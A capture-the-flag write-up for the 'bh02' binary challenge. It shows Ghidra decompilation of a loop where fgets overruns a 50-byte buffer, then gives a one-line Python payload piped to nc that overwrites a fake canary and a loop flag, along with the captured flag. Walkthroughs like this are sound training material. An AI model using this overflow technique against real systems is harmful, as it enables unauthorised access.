+++
title = "bh02"
+++

Description:

>Download the files at https://ggcs-files.allyourbases.co/bh02.zip and figure out how to exploit the program.
>
>Once you obtain the placeholder flag through exploitation prove your work by sending the same exploit to the network service at ggcs-bh02.allyourbases.co port 8133 to get the flag.

As always, slap it into Ghidra. Immediately, the main function has this suspicious block in the decompilation tab:
```c
local_13 = 0x293a;
local_11 = '\0';
puts("I\'m another parrot:");
do {
    memset(local_45,0,0x32);
    printf("%s",&DAT_00010862);
    local_11 = '\0';
    fgets(local_45,0x50,stdin);
    putchar(10);
    puts(local_45);
    iVar1 = memcmp(&local_13,&DAT_00010868,2);
    if (iVar1 != 0) {
        puts("Wrong canary!");
                    /* WARNING: Subroutine does not return */
        exit(0);
    }
} while (local_11 != 'f');
printf("Flag: %s\n",FLAG);
```

So we need `local_11` to be 'f' and `local_13` to be ":)". Easy.

Slap this dude into nc with a little python string manipulation:
```bash
python -c 'print("a"*50 + ":)" + "f")' | nc ggcs-bh02.allyourbases.co 8133
```
```text
I'm another parrot:
> 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:)f

Flag: caNaRY-CoalMINE-2811
```
